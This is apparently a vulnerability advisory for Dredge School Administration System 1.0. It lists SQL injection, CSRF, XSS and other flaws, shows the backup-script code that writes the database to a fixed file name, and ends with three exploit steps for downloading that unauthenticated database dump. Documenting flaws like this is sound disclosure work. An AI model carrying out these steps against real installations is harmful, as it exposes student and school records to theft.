39 lines
No EOL
1.5 KiB
Text
39 lines
No EOL
1.5 KiB
Text
source: https://www.securityfocus.com/bid/64720/info
|
|
|
|
Dredge School Administration System is prone to the following security vulnerabilities:
|
|
|
|
1. An SQL-injection vulnerability
|
|
2. A cross-site request forgery vulnerability
|
|
3. A cross-site scripting vulnerability
|
|
4. An information-disclosure vulnerability
|
|
5. A security-bypass vulnerability
|
|
|
|
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
|
|
|
|
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
|
|
|
|
II. Backup Download
|
|
|
|
##############
|
|
VULNERABILITY
|
|
##############
|
|
|
|
/Backup/processbackup.php (LINE: 89-93)
|
|
|
|
-----------------------------------------------------------------------------
|
|
//save file
|
|
// $handle =
|
|
fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
|
|
$handle = fopen('RecordManager.sql','w+');
|
|
fwrite($handle,$return);
|
|
fclose($handle);
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
#####################################################
|
|
EXPLOIT
|
|
#####################################################
|
|
|
|
1. Open http://www.example.com/DSM/Backup/processbackup.php
|
|
2. When you open the link produces RecordManager.sql
|
|
3. to download backup [http://www.example.com/DSM/Backup/RecordManager.sql] |